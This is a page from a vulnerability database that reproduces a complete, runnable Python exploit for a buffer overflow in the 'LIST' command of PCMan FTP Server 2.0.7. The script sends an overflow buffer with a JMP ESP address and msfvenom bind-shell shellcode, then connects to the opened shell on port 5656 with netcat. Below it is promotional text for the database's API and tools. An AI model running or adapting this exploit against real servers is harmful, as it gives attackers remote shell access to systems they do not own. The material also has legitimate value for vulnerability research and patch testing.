Vulners
Lucene search
PCMan FTP Server 2.0.7 LIST Buffer Overflow Exploit
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0.7 - 'LIST' Command Buffer Overflow
# Date: 07/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website: http://yildirimyunus.com
# Contact: [email protected]
# Tested on: Windows 7 Ultimate 32Bit
import socket
import sys
import os
import time
def exploit(target, port):
eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"
"\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"
"\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"
"\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"
"\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"
"\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"
"\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"
"\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"
"\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"
"\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"
"\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"
"\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"
"\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"
"\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"
"\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"
"\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"
"\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"
"\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"
"\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"
"\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"
"\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"
"\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"
"\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"
"\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")
buffer = 'A'*2006 + eip + "\x90"*21 + shellcode
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port))
s.recv(1024)
print "[+] Connect to %s on port %d" % (target,port)
except Exception, e:
print "[-] Could not create socket", e.message
sys.exit(0)
try:
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS CT-Zer0\r\n')
s.recv(1024)
s.send('LIST ' + buffer + '\r\n')
print "[+] Exploit Sent Successfully"
s.close()
print '[+] You got bind shell on port 5656\n'
time.sleep(2)
os.system('nc ' + target + ' 5656')
except:
print "[-] Could not connect to target"
def banner():
banner = "\n\n"
banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n"
banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n"
banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"
banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n"
banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n"
banner +=" \n"
print banner
if len(sys.argv) == 3:
banner()
target = sys.argv[1]
port = int(sys.argv[2])
exploit(target, port)
else:
banner()
print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0]
sys.exit(0)
# 0day.today [2018-04-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Nov 2016 00:00Current
0.6Low risk
Vulners AI Score0.6